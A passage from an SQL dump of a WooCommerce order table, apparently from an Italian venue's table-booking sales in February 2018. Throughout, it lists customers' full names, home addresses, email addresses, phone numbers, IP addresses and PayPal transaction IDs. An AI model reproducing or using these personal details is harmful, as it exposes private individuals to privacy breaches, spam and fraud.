prenotazione tavolo. Quanti adulti?','2'),(9577,598,'Numero bambini fino a 6 anni','0'),(9578,598,'Numero ragazzi fino a 13 anni','0'),(9579,598,'Files attached','[]'),(9580,599,'_order_key','wc_order_5a7c583eb8899'),(9581,599,'_customer_user','0'),(9582,599,'_payment_method','paypal'),(9583,599,'_payment_method_title','PayPal'),(9584,599,'_transaction_id','3HM53867CB2232935'),(9585,599,'_customer_ip_address','151.42.215.226'),(9586,599,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 11_2_5 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d60 safari/604.1'),(9587,599,'_created_via','checkout'),(9588,599,'_date_completed',''),(9589,599,'_completed_date',''),(9590,599,'_date_paid','1518098611'),(9591,599,'_paid_date','2018-02-08 15:03:31'),(9592,599,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(9593,599,'_billing_first_name','Giancarlo'),(9594,599,'_billing_last_name','Opizzi'),(9595,599,'_billing_company',''),(9596,599,'_billing_address_1','Via Sintoni, 27/D'),(9597,599,'_billing_address_2',''),(9598,599,'_billing_city','Cesenatico'),(9599,599,'_billing_state',''),(9600,599,'_billing_postcode',''),(9601,599,'_billing_country',''),(9602,599,'_billing_email','giancarloopizzi957@gmail.com'),(9603,599,'_billing_phone','3487595407'),(9604,599,'_shipping_first_name',''),(9605,599,'_shipping_last_name',''),(9606,599,'_shipping_company',''),(9607,599,'_shipping_address_1',''),(9608,599,'_shipping_address_2',''),(9609,599,'_shipping_city',''),(9610,599,'_shipping_state',''),(9611,599,'_shipping_postcode',''),(9612,599,'_shipping_country',''),(9613,599,'_order_currency','EUR'),(9614,599,'_cart_discount','0'),(9615,599,'_cart_discount_tax','0'),(9616,599,'_order_shipping','0.00'),(9617,599,'_order_shipping_tax','0'),(9618,599,'_order_tax','0'),(9619,599,'_order_total','60.00'),(9620,599,'_order_version','3.2.6'),(9621,599,'_prices_include_tax','no'),(9622,599,'_billing_address_index','Giancarlo Opizzi  Via Sintoni, 27/D  Cesenatico    giancarloopizzi957@gmail.com 3487595407'),(9623,599,'_shipping_address_index','        '),(9624,599,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(9625,599,'Numero bambini fino a 6 anni','0'),(9626,599,'Numero ragazzi fino a 13 anni','0'),(9627,599,'Files attached','[]'),(9628,599,'Payer PayPal address','giancarloopizzi957@gmail.com'),(9629,599,'Payer first name','Giancarlo'),(9630,599,'Payer last name','Opizzi'),(9631,599,'Payment type','instant'),(9632,599,'_paypal_status','completed'),(9633,599,'_download_permissions_granted','yes'),(9634,599,'_recorded_sales','yes'),(9635,599,'_recorded_coupon_usage_counts','yes'),(9636,599,'_order_stock_reduced','yes'),(9637,599,'PayPal Transaction Fee','2.39'),(9638,600,'_order_key','wc_order_5a808d399798a'),(9639,600,'_customer_user','0'),(9640,600,'_payment_method','paypal'),(9641,600,'_payment_method_title','PayPal'),(9642,600,'_transaction_id','6W373677WB706914H'),(9643,600,'_customer_ip_address','94.160.230.231'),(9644,600,'_customer_user_agent','mozilla/5.0 (ipad; cpu os 9_3_5 like mac os x) applewebkit/601.1.46 (khtml, like gecko) version/9.0 mobile/13g36 safari/601.1'),(9645,600,'_created_via','checkout'),(9646,600,'_date_completed',''),(9647,600,'_completed_date',''),(9648,600,'_date_paid','1518374492'),(9649,600,'_paid_date','2018-02-11 19:41:32'),(9650,600,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(9651,600,'_billing_first_name','Andrea'),(9652,600,'_billing_last_name','Marzoli'),(9653,600,'_billing_company',''),(9654,600,'_billing_address_1','Via R. Sanzio 8'),(9655,600,'_billing_address_2',''),(9656,600,'_billing_city','Montecchio di Vallefoglia (PU)'),(9657,600,'_billing_state',''),(9658,600,'_billing_postcode',''),(9659,600,'_billing_country',''),(9660,600,'_billing_email','andrea.marzoli22@gmail.com'),(9661,600,'_billing_phone','3337414912'),(9662,600,'_shipping_first_name',''),(9663,600,'_shipping_last_name',''),(9664,600,'_shipping_company',''),(9665,600,'_shipping_address_1',''),(9666,600,'_shipping_address_2',''),(9667,600,'_shipping_city',''),(9668,600,'_shipping_state',''),(9669,600,'_shipping_postcode',''),(9670,600,'_shipping_country',''),(9671,600,'_order_currency','EUR'),(9672,600,'_cart_discount','0'),(9673,600,'_cart_discount_tax','0'),(9674,600,'_order_shipping','0.00'),(9675,600,'_order_shipping_tax','0'),(9676,600,'_order_tax','0'),(9677,600,'_order_total','60.00'),(9678,600,'_order_version','3.2.6'),(9679,600,'_prices_include_tax','no'),(9680,600,'_billing_address_index','Andrea Marzoli  Via R. Sanzio 8  Montecchio di Vallefoglia (PU)    andrea.marzoli22@gmail.com 3337414912'),(9681,600,'_shipping_address_index','        '),(9682,600,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(9683,600,'Numero bambini fino a 6 anni','0'),(9684,600,'Numero ragazzi fino a 13 anni','0'),(9685,600,'Files attached','[]'),(9686,600,'Payer PayPal address','andrea.marzoli22@gmail.com'),(9687,600,'Payer first name','Patrizia'),(9688,600,'Payer last name','Massanelli'),(9689,600,'Payment type','instant'),(9690,600,'_paypal_status','completed'),(9691,600,'_download_permissions_granted','yes'),(9692,600,'_recorded_sales','yes'),(9693,600,'_recorded_coupon_usage_counts','yes'),(9694,600,'_order_stock_reduced','yes'),(9695,600,'PayPal Transaction Fee','2.39'),(9696,601,'_order_key','wc_order_5a80a871da772'),(9697,601,'_customer_user','19'),(9698,601,'_payment_method','paypal'),(9699,601,'_payment_method_title','PayPal'),(9700,601,'_transaction_id','6FD77586ET029003H'),(9701,601,'_customer_ip_address','79.30.38.44'),(9702,601,'_customer_user_agent','mozilla/5.0 (windows nt 6.3; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/63.0.3239.132 safari/537.36'),(9703,601,'_created_via','checkout'),(9704,601,'_date_completed',''),(9705,601,'_completed_date',''),(9706,601,'_date_paid','1518381348'),(9707,601,'_paid_date','2018-02-11 21:35:48'),(9708,601,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(9709,601,'_billing_first_name','Marco'),(9710,601,'_billing_last_name','Uguccioni'),(9711,601,'_billing_company',''),(9712,601,'_billing_address_1','Via Papiria 85'),(9713,601,'_billing_address_2',''),(9714,601,'_billing_city','Fano'),(9715,601,'_billing_state',''),(9716,601,'_billing_postcode',''),(9717,601,'_billing_country',''),(9718,601,'_billing_email','marcouguccioni98@gmail.com'),(9719,601,'_billing_phone','3336160596'),(9720,601,'_shipping_first_name',''),(9721,601,'_shipping_last_name',''),(9722,601,'_shipping_company',''),(9723,601,'_shipping_address_1',''),(9724,601,'_shipping_address_2',''),(9725,601,'_shipping_city',''),(9726,601,'_shipping_state',''),(9727,601,'_shipping_postcode',''),(9728,601,'_shipping_country',''),(9729,601,'_order_currency','EUR'),(9730,601,'_cart_discount','0'),(9731,601,'_cart_discount_tax','0'),(9732,601,'_order_shipping','0.00'),(9733,601,'_order_shipping_tax','0'),(9734,601,'_order_tax','0'),(9735,601,'_order_total','60.00'),(9736,601,'_order_version','3.2.6'),(9737,601,'_prices_include_tax','no'),(9738,601,'_billing_address_index','Marco Uguccioni  Via Papiria 85  Fano    marcouguccioni98@gmail.com 3336160596'),(9739,601,'_shipping_address_index','        '),(9740,601,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(9741,601,'Numero bambini fino a 6 anni','0'),(9742,601,'Numero ragazzi fino a 13 anni','0'),(9743,601,'Files attached','[]'),(9744,601,'Payer PayPal address','marcouguccioni98@gmail.com'),(9745,601,'Payer first name','Marco'),(9746,601,'Payer last name','Uguccioni'),(9747,601,'Payment type','instant'),(9748,601,'_paypal_status','completed'),(9749,601,'_download_permissions_granted','yes'),(9750,601,'_recorded_sales','yes'),(9751,601,'_recorded_coupon_usage_counts','yes'),(9752,601,'_order_stock_reduced','yes'),(9753,601,'PayPal Transaction Fee','2.39'),(9754,602,'_order_key','wc_order_5a81bce55c0c2'),(9755,602,'_customer_user','0'),(9756,602,'_payment_method','paypal'),(9757,602,'_payment_method_title','PayPal'),(9758,602,'_transaction_id','2MV14728601380845'),(9759,602,'_customer_ip_address','93.67.126.0'),(9760,602,'_customer_user_agent','mozilla/5.0 (linux; android 7.0; asus_x008d build/nrd90m) applewebkit/537.36 (khtml, like gecko) chrome/64.0.3282.137 mobile safari/537.36'),(9761,602,'_created_via','checkout'),(9762,602,'_date_completed',''),(9763,602,'_completed_date',''),(9764,602,'_date_paid','1518452112'),(9765,602,'_paid_date','2018-02-12 17:15:12'),(9766,602,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(9767,602,'_billing_first_name','yannick cesar'),(9768,602,'_billing_last_name','Da cruz'),(9769,602,'_billing_company',''),(9770,602,'_billing_address_1','Viale Pirandello 6'),(9771,602,'_billing_address_2',''),(9772,602,'_billing_city','Riccione'),(9773,602,'_billing_state',''),(9774,602,'_billing_postcode',''),(9775,602,'_billing_country',''),(9776,602,'_billing_email','maria23yan@gmail.com'),(9777,602,'_billing_phone','3805850767'),(9778,602,'_shipping_first_name',''),(9779,602,'_shipping_last_name',''),(9780,602,'_shipping_company',''),(9781,602,'_shipping_address_1',''),(9782,602,'_shipping_address_2',''),(9783,602,'_shipping_city',''),(9784,602,'_shipping_state',''),(9785,602,'_shipping_postcode',''),(9786,602,'_shipping_country',''),(9787,602,'_order_currency','EUR'),(9788,602,'_cart_discount','0'),(9789,602,'_cart_discount_tax','0'),(9790,602,'_order_shipping','0.00'),(9791,602,'_order_shipping_tax','0'),(9792,602,'_order_tax','0'),(9793,602,'_order_total','60.00'),(9794,602,'_order_version','3.2.6'),(9795,602,'_prices_include_tax','no'),(9796,602,'_billing_address_index','yannick cesar Da cruz  Viale Pirandello 6  Riccione    maria23yan@gmail.com 3805850767'),(9797,602,'_shipping_address_index','        '),(9798,602,'Indicare in caso di prenotazione tavolo. Quanti adulti?','1'),(9799,602,'Numero bambini fino a 6 anni','2'),(9800,602,'Numero ragazzi fino a 13 anni','1'),(9801,602,'Files attached','[]'),(9802,602,'Payer PayPal address','maria23yan@gmail.com'),(9803,602,'Payer first name','yannick cesar'),(9804,602,'Payer last name','Da cruz'),(9805,602,'Payment type','instant'),(9806,602,'_paypal_status','completed'),(9807,602,'_download_permissions_granted','yes'),(9808,602,'_recorded_sales','yes'),(9809,602,'_recorded_coupon_usage_counts','yes'),(9810,602,'_order_stock_reduced','yes'),(9811,602,'PayPal Transaction Fee','2.39'),(9812,604,'_order_key','wc_order_5a81cbff6835d'),(9813,604,'_customer_user','0'),(9814,604,'_payment_method','paypal'),(9815,604,'_payment_method_title','PayPal'),(9816,604,'_transaction_id','1UD82613LT330932G'),(9817,604,'_customer_ip_address','151.36.75.245'),(9818,604,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_5 like mac os x) applewebkit/604.1.34 (khtml, like gecko) gsa/42.0.183854831 mobile/15d60 safari/604.1'),(9819,604,'_created_via','checkout'),(9820,604,'_date_completed',''),(9821,604,'_completed_date',''),(9822,604,'_date_paid','1518455964'),(9823,604,'_paid_date','2018-02-12 18:19:24'),(9824,604,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(9825,604,'_billing_first_name','Anna'),(9826,604,'_billing_last_name','Torri'),(9827,604,'_billing_company',''),(9828,604,'_billing_address_1','Via San Giovanni 48a'),(9829,604,'_billing_address_2',''),(9830,604,'_billing_city','Misano Adriatico'),(9831,604,'_billing_state',''),(9832,604,'_billing_postcode',''),(9833,604,'_billing_country',''),(9834,604,'_billing_email','Lopparag@gmai.com'),(9835,604,'_billing_phone','3286644487'),(9836,604,'_shipping_first_name',''),(9837,604,'_shipping_last_name',''),(9838,604,'_shipping_company',''),(9839,604,'_shipping_address_1',''),(9840,604,'_shipping_address_2',''),(9841,604,'_shipping_city',''),(9842,604,'_shipping_state',''),(9843,604,'_shipping_postcode',''),(9844,604,'_shipping_country',''),(9845,604,'_order_currency','EUR'),(9846,604,'_cart_discount','0'),(9847,604,'_cart_discount_tax','0'),(9848,604,'_order_shipping','0.00'),(9849,604,'_order_shipping_tax','0'),(9850,604,'_order_tax','0'),(9851,604,'_order_total','60.00'),(9852,604,'_order_version','3.3.1'),(9853,604,'_prices_include_tax','no'),(9854,604,'_billing_address_index','Anna Torri  Via San Giovanni 48a  Misano Adriatico    Lopparag@gmai.com 3286644487'),(9855,604,'_shipping_address_index','        '),(9856,604,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(9857,604,'Numero bambini fino a 6 anni','0'),(9858,604,'Numero ragazzi fino a 13 anni','0'),(9859,604,'Files attached','[]'),(9860,604,'Payer PayPal address','suppacastel@gmail.com'),(9861,604,'Payer first name','Andrea'),(9862,604,'Payer last name','Castellani'),(9863,604,'Payment type','instant'),(9864,604,'_paypal_status','completed'),(9865,604,'_download_permissions_granted','yes'),(9866,604,'_recorded_sales','yes'),(9867,604,'_recorded_coupon_usage_counts','yes'),(9868,604,'_order_stock_reduced','yes'),(9869,604,'PayPal Transaction Fee','2.39'),(9870,605,'_order_key','wc_order_5a81d3be8451a'),(9871,605,'_customer_user','20'),(9872,605,'_payment_method','paypal'),(9873,605,'_payment_method_title','PayPal'),(9874,605,'_transaction_id','48170883Y7223515D'),(9875,605,'_customer_ip_address','93.40.208.106'),(9876,605,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_5 like mac os x) applewebkit/604.5.6 (khtml, like gecko) version/11.0 mobile/15d60 safari/604.1'),(9877,605,'_created_via','checkout'),(9878,605,'_date_completed',''),(9879,605,'_completed_date',''),(9880,605,'_date_paid','1518457929'),(9881,605,'_paid_date','2018-02-12 18:52:09'),(9882,605,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(9883,605,'_billing_first_name','Mattia'),(9884,605,'_billing_last_name','Marangoni'),(9885,605,'_billing_company',''),(9886,605,'_billing_address_1','Ponchielli 20'),(9887,605,'_billing_address_2',''),(9888,605,'_billing_city','Riccione'),(9889,605,'_billing_state',''),(9890,605,'_billing_postcode',''),(9891,605,'_billing_country',''),(9892,605,'_billing_email','Marangonimattia@me.com'),(9893,605,'_billing_phone','3920685378'),(9894,605,'_shipping_first_name',''),(9895,605,'_shipping_last_name',''),(9896,605,'_shipping_company',''),(9897,605,'_shipping_address_1',''),(9898,605,'_shipping_address_2',''),(9899,605,'_shipping_city',''),(9900,605,'_shipping_state',''),(9901,605,'_shipping_postcode',''),(9902,605,'_shipping_country',''),(9903,605,'_order_currency','EUR'),(9904,605,'_cart_discount','0'),(9905,605,'_cart_discount_tax','0'),(9906,605,'_order_shipping','0.00'),(9907,605,'_order_shipping_tax','0'),(9908,605,'_order_tax','0'),(9909,605,'_order_total','60.00'),(9910,605,'_order_version','3.3.1'),(9911,605,'_prices_include_tax','no'),(9912,605,'_billing_address_index','Mattia Marangoni  Ponchielli 20  Riccione    Marangonimattia@me.com 3920685378'),(9913,605,'_shipping_address_index','        '),(9914,605,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(9915,605,'Numero bambini fino a 6 anni','0'),(9916,605,'Numero ragazzi fino a 13 anni','0'),(9917,605,'Files attached','[]'),(9918,605,'Payer PayPal address','Marangonimattia@me.com'),(9919,605,'Payer first name','Mattia'),(9920,605,'Payer last name','Marangoni'),(9921,605,'Payment type','instant'),(9922,605,'_paypal_status','completed'),(9923,605,'_download_permissions_granted','yes'),(9924,605,'_recorded_sales','yes'),(9925,605,'_recorded_coupon_usage_counts','yes'),(9926,605,'_order_stock_reduced','yes'),(9927,605,'PayPal Transaction Fee','2.39'),(9928,606,'_order_key','wc_order_5a81da0e557ce'),(9929,606,'_customer_user','21'),(9930,606,'_payment_method','paypal'),(9931,606,'_payment_method_title','PayPal'),(9932,606,'_transaction_id','73B626201X127314F'),(9933,606,'_customer_ip_address','93.146.77.45'),(9934,606,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_1 like mac os x) applewebkit/604.4.7 (khtml, like gecko) version/11.0 mobile/15c153 safari/604.1'),(9935,606,'_created_via','checkout'),(9936,606,'_date_completed',''),(9937,606,'_completed_date',''),(9938,606,'_date_paid','1518459595'),(9939,606,'_paid_date','2018-02-12 19:19:55'),(9940,606,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(9941,606,'_billing_first_name','Virginia'),(9942,606,'_billing_last_name','Della Balda'),(9943,606,'_billing_company',''),(9944,606,'_billing_address_1','Via Raffaele Adimari 4'),(9945,606,'_billing_address_2',''),(9946,606,'_billing_city','Rimini'),(9947,606,'_billing_state',''),(9948,606,'_billing_postcode',''),(9949,606,'_billing_country',''),(9950,606,'_billing_email','virginiadellabalda@me.com'),(9951,606,'_billing_phone','3331432560'),(9952,606,'_shipping_first_name',''),(9953,606,'_shipping_last_name',''),(9954,606,'_shipping_company',''),(9955,606,'_shipping_address_1',''),(9956,606,'_shipping_address_2',''),(9957,606,'_shipping_city',''),(9958,606,'_shipping_state',''),(9959,606,'_shipping_postcode',''),(9960,606,'_shipping_country',''),(9961,606,'_order_currency','EUR'),(9962,606,'_cart_discount','0'),(9963,606,'_cart_discount_tax','0'),(9964,606,'_order_shipping','0.00'),(9965,606,'_order_shipping_tax','0'),(9966,606,'_order_tax','0'),(9967,606,'_order_total','60.00'),(9968,606,'_order_version','3.3.1'),(9969,606,'_prices_include_tax','no'),(9970,606,'_billing_address_index','Virginia Della Balda  Via Raffaele Adimari 4  Rimini    virginiadellabalda@me.com 3331432560'),(9971,606,'_shipping_address_index','        '),(9972,606,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(9973,606,'Numero bambini fino a 6 anni','0'),(9974,606,'Numero ragazzi fino a 13 anni','0'),(9975,606,'Files attached','[]'),(9976,606,'Payer PayPal address','virginiadellabalda@me.com'),(9977,606,'Payer first name','Virginia'),(9978,606,'Payer last name','Della Balda'),(9979,606,'Payment type','instant'),(9980,606,'_paypal_status','completed'),(9981,606,'_download_permissions_granted','yes'),(9982,606,'_recorded_sales','yes'),(9983,606,'_recorded_coupon_usage_counts','yes'),(9984,606,'_order_stock_reduced','yes'),(9985,606,'PayPal Transaction Fee','2.39'),(9986,607,'_order_key','wc_order_5a81f8439ab44'),(9987,607,'_customer_user','0'),(9988,607,'_payment_method','paypal'),(9989,607,'_payment_method_title','PayPal'),(9990,607,'_transaction_id',''),(9991,607,'_customer_ip_address','77.242.220.224'),(9992,607,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_2 like mac os x) applewebkit/604.4.7 (khtml, like gecko) version/11.0 mobile/15c202 safari/604.1'),(9993,607,'_created_via','checkout'),(9994,607,'_date_completed',''),(9995,607,'_completed_date',''),(9996,607,'_date_paid',''),(9997,607,'_paid_date',''),(9998,607,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(9999,607,'_billing_first_name','Federico'),(10000,607,'_billing_last_name','Proli'),(10001,607,'_billing_company',''),(10002,607,'_billing_address_1',''),(10003,607,'_billing_address_2',''),(10004,607,'_billing_city',''),(10005,607,'_billing_state',''),(10006,607,'_billing_postcode',''),(10007,607,'_billing_country',''),(10008,607,'_billing_email','federico.proli92@gmail.com'),(10009,607,'_billing_phone','3347547061'),(10010,607,'_shipping_first_name',''),(10011,607,'_shipping_last_name',''),(10012,607,'_shipping_company',''),(10013,607,'_shipping_address_1',''),(10014,607,'_shipping_address_2',''),(10015,607,'_shipping_city',''),(10016,607,'_shipping_state',''),(10017,607,'_shipping_postcode',''),(10018,607,'_shipping_country',''),(10019,607,'_order_currency','EUR'),(10020,607,'_cart_discount','0'),(10021,607,'_cart_discount_tax','0'),(10022,607,'_order_shipping','0.00'),(10023,607,'_order_shipping_tax','0'),(10024,607,'_order_tax','0'),(10025,607,'_order_total','60.00'),(10026,607,'_order_version','3.3.1'),(10027,607,'_prices_include_tax','no'),(10028,607,'_billing_address_index','Federico Proli        federico.proli92@gmail.com 3347547061'),(10029,607,'_shipping_address_index','        '),(10030,607,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(10031,607,'Numero bambini fino a 6 anni','0'),(10032,607,'Numero ragazzi fino a 13 anni','0'),(10033,607,'Files attached','[]'),(10034,608,'_order_key','wc_order_5a81f8f0ba7ac'),(10035,608,'_customer_user','0'),(10036,608,'_payment_method','paypal'),(10037,608,'_payment_method_title','PayPal'),(10038,608,'_transaction_id',''),(10039,608,'_customer_ip_address','77.242.220.224'),(10040,608,'_customer_user_agent','mozilla/5.0 (iphone; cpu iphone os 11_2_2 like mac os x) applewebkit/604.4.7 (khtml, like gecko) version/11.0 mobile/15c202 safari/604.1'),(10041,608,'_created_via','checkout'),(10042,608,'_date_completed',''),(10043,608,'_completed_date',''),(10044,608,'_date_paid',''),(10045,608,'_paid_date',''),(10046,608,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(10047,608,'_billing_first_name','Federico'),(10048,608,'_billing_last_name','Proli'),(10049,608,'_billing_company',''),(10050,608,'_billing_address_1',''),(10051,608,'_billing_address_2',''),(10052,608,'_billing_city',''),(10053,608,'_billing_state',''),(10054,608,'_billing_postcode',''),(10055,608,'_billing_country',''),(10056,608,'_billing_email','federico.proli92@gmail.com'),(10057,608,'_billing_phone','3347547061'),(10058,608,'_shipping_first_name',''),(10059,608,'_shipping_last_name',''),(10060,608,'_shipping_company',''),(10061,608,'_shipping_address_1',''),(10062,608,'_shipping_address_2',''),(10063,608,'_shipping_city',''),(10064,608,'_shipping_state',''),(10065,608,'_shipping_postcode',''),(10066,608,'_shipping_country',''),(10067,608,'_order_currency','EUR'),(10068,608,'_cart_discount','0'),(10069,608,'_cart_discount_tax','0'),(10070,608,'_order_shipping','0.00'),(10071,608,'_order_shipping_tax','0'),(10072,608,'_order_tax','0'),(10073,608,'_order_total','60.00'),(10074,608,'_order_version','3.3.1'),(10075,608,'_prices_include_tax','no'),(10076,608,'_billing_address_index','Federico Proli        federico.proli92@gmail.com 3347547061'),(10077,608,'_shipping_address_index','        '),(10078,608,'Indicare in caso di prenotazione tavolo. Quanti adulti?','1'),(10079,608,'Numero bambini fino a 6 anni','0'),(10080,608,'Numero ragazzi fino a 13 anni','0'),(10081,608,'Files attached','[]'),(10082,609,'_order_key','wc_order_5a81fa92160ad'),(10083,609,'_customer_user','0'),(10084,609,'_payment_method','paypal'),(10085,609,'_payment_method_title','PayPal'),(10086,609,'_transaction_id','2CL11290C2017525G'),(10087,609,'_customer_ip_address','77.242.220.224'),(10088,609,'_customer_user_agent','mozilla/5.0 (macintosh; intel mac os x 10_12_1) applewebkit/602.2.14 (khtml, like gecko) version/10.0.1 safari/602.2.14'),(10089,609,'_created_via','checkout'),(10090,609,'_date_completed',''),(10091,609,'_completed_date',''),(10092,609,'_date_paid','1518467778'),(10093,609,'_paid_date','2018-02-12 21:36:18'),(10094,609,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(10095,609,'_billing_first_name','Federico'),(10096,609,'_billing_last_name','Proli'),(10097,609,'_billing_company',''),(10098,609,'_billing_address_1',''),(10099,609,'_billing_address_2',''),(10100,609,'_billing_city',''),(10101,609,'_billing_state',''),(10102,609,'_billing_postcode',''),(10103,609,'_billing_country',''),(10104,609,'_billing_email','federico.proli92@gmail.com'),(10105,609,'_billing_phone','3347547061'),(10106,609,'_shipping_first_name',''),(10107,609,'_shipping_last_name',''),(10108,609,'_shipping_company',''),(10109,609,'_shipping_address_1',''),(10110,609,'_shipping_address_2',''),(10111,609,'_shipping_city',''),(10112,609,'_shipping_state',''),(10113,609,'_shipping_postcode',''),(10114,609,'_shipping_country',''),(10115,609,'_order_currency','EUR'),(10116,609,'_cart_discount','0'),(10117,609,'_cart_discount_tax','0'),(10118,609,'_order_shipping','0.00'),(10119,609,'_order_shipping_tax','0'),(10120,609,'_order_tax','0'),(10121,609,'_order_total','60.00'),(10122,609,'_order_version','3.3.1'),(10123,609,'_prices_include_tax','no'),(10124,609,'_billing_address_index','Federico Proli        federico.proli92@gmail.com 3347547061'),(10125,609,'_shipping_address_index','        '),(10126,609,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(10127,609,'Numero bambini fino a 6 anni','0'),(10128,609,'Numero ragazzi fino a 13 anni','0'),(10129,609,'Files attached','[]'),(10130,609,'Payer PayPal address','federico.proli92@gmail.com'),(10131,609,'Payer first name','Federico'),(10132,609,'Payer last name','Proli'),(10133,609,'Payment type','instant'),(10134,609,'_paypal_status','completed'),(10135,609,'_download_permissions_granted','yes'),(10136,609,'_recorded_sales','yes'),(10137,609,'_recorded_coupon_usage_counts','yes'),(10138,609,'_order_stock_reduced','yes'),(10139,609,'PayPal Transaction Fee','2.39'),(10140,610,'_order_key','wc_order_5a82ba1380c88'),(10141,610,'_customer_user','0'),(10142,610,'_payment_method','paypal'),(10143,610,'_payment_method_title','PayPal'),(10144,610,'_transaction_id','0DC491653V620180X'),(10145,610,'_customer_ip_address','213.82.189.34'),(10146,610,'_customer_user_agent','mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/63.0.3239.132 safari/537.36'),(10147,610,'_created_via','checkout'),(10148,610,'_date_completed',''),(10149,610,'_completed_date',''),(10150,610,'_date_paid','1518516804'),(10151,610,'_paid_date','2018-02-13 11:13:24'),(10152,610,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(10153,610,'_billing_first_name','Matteo'),(10154,610,'_billing_last_name','Arlotti'),(10155,610,'_billing_company',''),(10156,610,'_billing_address_1',''),(10157,610,'_billing_address_2',''),(10158,610,'_billing_city',''),(10159,610,'_billing_state',''),(10160,610,'_billing_postcode',''),(10161,610,'_billing_country',''),(10162,610,'_billing_email','arlostaff@gmail.com'),(10163,610,'_billing_phone','3348323558'),(10164,610,'_shipping_first_name',''),(10165,610,'_shipping_last_name',''),(10166,610,'_shipping_company',''),(10167,610,'_shipping_address_1',''),(10168,610,'_shipping_address_2',''),(10169,610,'_shipping_city',''),(10170,610,'_shipping_state',''),(10171,610,'_shipping_postcode',''),(10172,610,'_shipping_country',''),(10173,610,'_order_currency','EUR'),(10174,610,'_cart_discount','0'),(10175,610,'_cart_discount_tax','0'),(10176,610,'_order_shipping','0.00'),(10177,610,'_order_shipping_tax','0'),(10178,610,'_order_tax','0'),(10179,610,'_order_total','60.00'),(10180,610,'_order_version','3.3.1'),(10181,610,'_prices_include_tax','no'),(10182,610,'_billing_address_index','Matteo Arlotti        arlostaff@gmail.com 3348323558'),(10183,610,'_shipping_address_index','        '),(10184,610,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(10185,610,'Numero bambini fino a 6 anni','0'),(10186,610,'Numero ragazzi fino a 13 anni','0'),(10187,610,'Files attached','[]'),(10188,610,'Payer PayPal address','arlostaff@gmail.com'),(10189,610,'Payer first name','Matteo'),(10190,610,'Payer last name','Arlotti'),(10191,610,'Payment type','instant'),(10192,610,'_paypal_status','completed'),(10193,610,'_download_permissions_granted','yes'),(10194,610,'_recorded_sales','yes'),(10195,610,'_recorded_coupon_usage_counts','yes'),(10196,610,'_order_stock_reduced','yes'),(10197,610,'PayPal Transaction Fee','2.39'),(10198,611,'_order_key','wc_order_5a83241189a73'),(10199,611,'_customer_user','0'),(10200,611,'_payment_method','paypal'),(10201,611,'_payment_method_title','PayPal'),(10202,611,'_transaction_id','7PU951307W4868003'),(10203,611,'_customer_ip_address','158.148.83.64'),(10204,611,'_customer_user_agent','mozilla/5.0 (linux; android 6.0; ale-l21 build/huaweiale-l21) applewebkit/537.36 (khtml, like gecko) chrome/63.0.3239.111 mobile safari/537.36'),(10205,611,'_created_via','checkout'),(10206,611,'_date_completed',''),(10207,611,'_completed_date',''),(10208,611,'_date_paid','1518544187'),(10209,611,'_paid_date','2018-02-13 18:49:47'),(10210,611,'_cart_hash','ac4aee62915c7b0591a85a390c3d2f5c'),(10211,611,'_billing_first_name','Matteo'),(10212,611,'_billing_last_name','Ticchi'),(10213,611,'_billing_company',''),(10214,611,'_billing_address_1',''),(10215,611,'_billing_address_2',''),(10216,611,'_billing_city',''),(10217,611,'_billing_state',''),(10218,611,'_billing_postcode',''),(10219,611,'_billing_country',''),(10220,611,'_billing_email','Tmatteo@fastwebnet.it'),(10221,611,'_billing_phone','3274954460'),(10222,611,'_shipping_first_name',''),(10223,611,'_shipping_last_name',''),(10224,611,'_shipping_company',''),(10225,611,'_shipping_address_1',''),(10226,611,'_shipping_address_2',''),(10227,611,'_shipping_city',''),(10228,611,'_shipping_state',''),(10229,611,'_shipping_postcode',''),(10230,611,'_shipping_country',''),(10231,611,'_order_currency','EUR'),(10232,611,'_cart_discount','0'),(10233,611,'_cart_discount_tax','0'),(10234,611,'_order_shipping','0.00'),(10235,611,'_order_shipping_tax','0'),(10236,611,'_order_tax','0'),(10237,611,'_order_total','60.00'),(10238,611,'_order_version','3.3.1'),(10239,611,'_prices_include_tax','no'),(10240,611,'_billing_address_index','Matteo Ticchi        Tmatteo@fastwebnet.it 3274954460'),(10241,611,'_shipping_address_index','        '),(10242,611,'Indicare in caso di prenotazione tavolo. Quanti adulti?','2'),(10243,611,'Numero bambini fino a 6 anni','0'),(10244,611,'Numero ragazzi fino a 13 anni','0'),(10245,611,'Files attached','[]'),(10246,611,'Payer PayPal address','Tmatteo@fastwebnet.it'),(10247,611,'Payer first name','Matteo'),(10248,611,'Payer last name','Ticchi'),(10249,611,'Payment type','instant'),(10250,611,'_paypal_status','completed'),(10251,611,'_download_permissions_granted','yes'),(10252,611,'_recorded_sales','yes'),(10253,611,'_recorded_coupon_usage_counts','yes'),(10254,611,'_order_stock_reduced','yes'),(10255,611,'PayPal Transaction 